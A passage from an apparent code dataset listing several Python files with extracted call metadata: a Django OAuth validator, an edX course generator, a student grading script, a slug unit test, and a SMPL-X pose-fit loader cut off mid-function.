| [((210, 11, 210, 51), 'aswiki.models.Topic.objects.css_class_name', 'Topic.objects.css_class_name', ({(210, 40, 210, 50): 'topic_name'}, {}), '(topic_name)', False, 'from aswiki.models import Topic\n'), ((227, 11, 227, 67), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((261, 9, 261, 25), 'genshi.builder.tag.ul', 'builder.tag.ul', ({}, {}), '()', False, 'from genshi import builder\n'), ((289, 9, 289, 25), 'genshi.builder.tag.ul', 'builder.tag.ul', ({}, {}), '()', False, 'from genshi import builder\n'), ((110, 20, 110, 36), 'dummy_threading.Lock', 'threading.Lock', ({}, {}), '()', True, 'import dummy_threading as threading\n'), ((154, 12, 154, 32), 'urlparse.urlparse', 'urlparse', ({(154, 21, 154, 31): 'image_name'}, {}), '(image_name)', False, 'from urlparse import urlparse\n'), ((317, 19, 317, 63), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((319, 19, 319, 51), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((363, 30, 363, 59), 'django.core.urlresolvers.reverse', 'reverse', ({(363, 38, 363, 58): '"""aswiki_topic_index"""'}, {}), "('aswiki_topic_index')", False, 'from django.core.urlresolvers import reverse\n'), ((324, 19, 324, 32), 'django.utils.translation.ugettext', '_', ({(324, 21, 324, 31): 'macro_body'}, {}), '(macro_body)', True, 'from django.utils.translation import ugettext as _\n'), ((326, 19, 326, 32), 'django.utils.translation.ugettext', '_', ({(326, 21, 326, 31): 'arg_string'}, {}), '(arg_string)', True, 'from django.utils.translation import ugettext as _\n'), ((334, 19, 334, 61), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((336, 19, 336, 61), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n')] |
anobi/django-oauth-api | oauth_api/validators.py | 95bf9b500dab326553a5a8a17d5c6da1a34f6ac4 | import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
Check that and Application exists with given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| [((29, 22, 29, 45), 'oauth_api.models.get_application_model', 'get_application_model', ({}, {}), '()', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((163, 20, 163, 80), 'oauth_api.models.AuthorizationCode.objects.get', 'AuthorizationCode.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((188, 20, 188, 88), 'oauth_api.models.AuthorizationCode.objects.get', 'AuthorizationCode.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((223, 23, 229, 9), 'oauth_api.models.AccessToken.objects.create', 'AccessToken.objects.create', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((365, 15, 365, 65), 'django.contrib.auth.authenticate', 'authenticate', (), '', False, 'from django.contrib.auth import authenticate\n'), ((67, 26, 67, 55), 'base64.b64decode', 'base64.b64decode', ({(67, 43, 67, 54): 'auth_string'}, {}), '(auth_string)', False, 'import base64\n'), ((176, 20, 176, 52), 'oauth_api.settings.oauth_api_settings.SCOPES.keys', 'oauth_api_settings.SCOPES.keys', ({}, {}), '()', False, 'from oauth_api.settings import oauth_api_settings\n'), ((195, 18, 195, 32), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((195, 35, 195, 96), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((218, 18, 218, 32), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((218, 35, 218, 96), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((236, 12, 242, 13), 'oauth_api.models.RefreshToken.objects.create', 'RefreshToken.objects.create', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((359, 40, 359, 72), 'oauth_api.settings.oauth_api_settings.SCOPES.keys', 'oauth_api_settings.SCOPES.keys', ({}, {}), '()', False, 'from oauth_api.settings import oauth_api_settings\n'), ((233, 26, 233, 40), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((233, 43, 233, 105), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((281, 27, 281, 84), 'oauth_api.models.AccessToken.objects.select_related', 'AccessToken.objects.select_related', ({(281, 62, 281, 75): '"""application"""', (281, 77, 281, 83): '"""user"""'}, {}), "('application', 'user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((305, 24, 305, 72), 'oauth_api.models.AuthorizationCode.objects.select_related', 'AuthorizationCode.objects.select_related', ({(305, 65, 305, 71): '"""user"""'}, {}), "('user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((332, 17, 332, 60), 'oauth_api.models.RefreshToken.objects.select_related', 'RefreshToken.objects.select_related', ({(332, 53, 332, 59): '"""user"""'}, {}), "('user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((213, 16, 213, 69), 'oauth_api.models.RefreshToken.objects.get', 'RefreshToken.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n')] |
padmacho/pythontutorial | objects/fun_return.py | 80c58d2d6efc0c3598f92b627338c6cd9fda1759 | def modify(y):
return y # returns same reference. No new object is created
x = [1, 2, 3]
y = modify(x)
print("x == y", x == y)
print("x == y", x is y) | [] |
hberndl70/mooc-generator | edx_gen/_write_comps.py | 58ff77ece12b456887ec24db79d8baa87ecd5621 | import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| [((27, 20, 27, 52), 'edx_gen._markdown.convertMd', '_markdown.convertMd', ({(27, 40, 27, 51): 'md_filepath'}, {}), '(md_filepath)', False, 'from edx_gen import _markdown\n'), ((87, 19, 88, 66), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(87, 50, 87, 61): 'md_filepath', (87, 63, 87, 71): 'meta_tag', (88, 12, 88, 37): '_edx_consts.COMP_HTML_REQ', (88, 39, 88, 64): '_edx_consts.COMP_HTML_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT)', False, 'from edx_gen import _read_metadata\n'), ((101, 15, 102, 78), 'edx_gen._write_comp_html.writeXmlForHtmlComp', '_write_comp_html.writeXmlForHtmlComp', ({(102, 12, 102, 23): 'md_filepath', (102, 25, 102, 38): 'comp_filename', (102, 40, 102, 52): 'tree_snippet', (102, 54, 102, 62): 'settings', (102, 64, 102, 77): 'unit_filename'}, {}), '(md_filepath, comp_filename,\n tree_snippet, settings, unit_filename)', False, 'from edx_gen import _write_comp_html\n'), ((108, 19, 109, 76), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(108, 50, 108, 61): 'md_filepath', (108, 63, 108, 71): 'meta_tag', (109, 12, 109, 42): '_edx_consts.COMP_PROB_QUIZ_REQ', (109, 44, 109, 74): '_edx_consts.COMP_PROB_QUIZ_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT)', False, 'from edx_gen import _read_metadata\n'), ((121, 15, 122, 78), 'edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp', '_write_comp_checkboxes.writeXmlForProbCheckboxesComp', ({(122, 12, 122, 23): 'md_filepath', (122, 25, 122, 38): 'comp_filename', (122, 40, 122, 52): 'tree_snippet', (122, 54, 122, 62): 'settings', (122, 64, 122, 77): 'unit_filename'}, {}), '(md_filepath,\n comp_filename, tree_snippet, settings, unit_filename)', False, 'from edx_gen import _write_comp_checkboxes\n'), ((129, 19, 130, 91), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(130, 12, 130, 23): 'md_filepath', (130, 25, 130, 33): 'meta_tag', (130, 35, 130, 61): '_edx_consts.COMP_VIDEO_REQ', (130, 63, 130, 89): '_edx_consts.COMP_VIDEO_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT)', False, 'from edx_gen import _read_metadata\n'), ((145, 15, 146, 64), 'edx_gen._write_comp_video.writeXmlForVidComp', '_write_comp_video.writeXmlForVidComp', ({(146, 12, 146, 23): 'md_filepath', (146, 25, 146, 38): 'comp_filename', (146, 40, 146, 48): 'settings', (146, 50, 146, 63): 'unit_filename'}, {}), '(md_filepath, comp_filename, settings,\n unit_filename)', False, 'from edx_gen import _write_comp_video\n'), ((153, 19, 154, 77), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(153, 50, 153, 61): 'md_filepath', (153, 63, 153, 71): 'meta_tag', (154, 12, 154, 43): '_edx_consts.COMP_GOOGLE_DOC_REQ', (154, 45, 154, 76): '_edx_consts.COMP_GOOGLE_DOC_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)', False, 'from edx_gen import _read_metadata\n'), ((163, 15, 163, 90), 'edx_gen._xml_google_doc.tagForGoogleDocComp', '_xml_google_doc.tagForGoogleDocComp', ({(163, 51, 163, 64): 'comp_filename', (163, 66, 163, 74): 'settings', (163, 76, 163, 89): 'unit_filename'}, {}), '(comp_filename, settings, unit_filename)', False, 'from edx_gen import _xml_google_doc\n')] |
ByeonghoonJeon/Student-Grading | grading_program.py | eee55638aee4390d7758c1204b85cce7279ccdf7 | # 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Creat a function that evaluate the validity of name.
def check_name(name):
# 2.1.1 Remove period and blank and check it if the name is comprised with only Alphabet.
# 2.1.1.1 Make a list of spelling in the name.
list_of_spelling = list(name)
# 2.1.1.2 Remove period and blank from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
# 2.1.1.4 Return if the string is Alphabet.
return list_to_string.isalpha()
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
check_name(name)
# 2.3 Check if the name is alphabet. If not, ask to input correct name again.
while check_name(name) != True:
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while score.isdigit() == False or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
| [] |
by46/recipe | test/test_utils.py | 203abd2141a536b66b4e57d073169a49395be1f0 | import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| [((9, 24, 9, 62), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(9, 49, 9, 61): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((12, 24, 12, 62), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(12, 49, 12, 61): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((15, 25, 15, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(15, 50, 15, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((18, 25, 18, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(18, 50, 18, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((21, 25, 21, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(21, 50, 21, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n')] |
wangxihao/rgbd-kinect-pose | extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
for i in range(0, pose_body_mats.shape[0]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i])
pose_body[3 * i: 3 * i + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
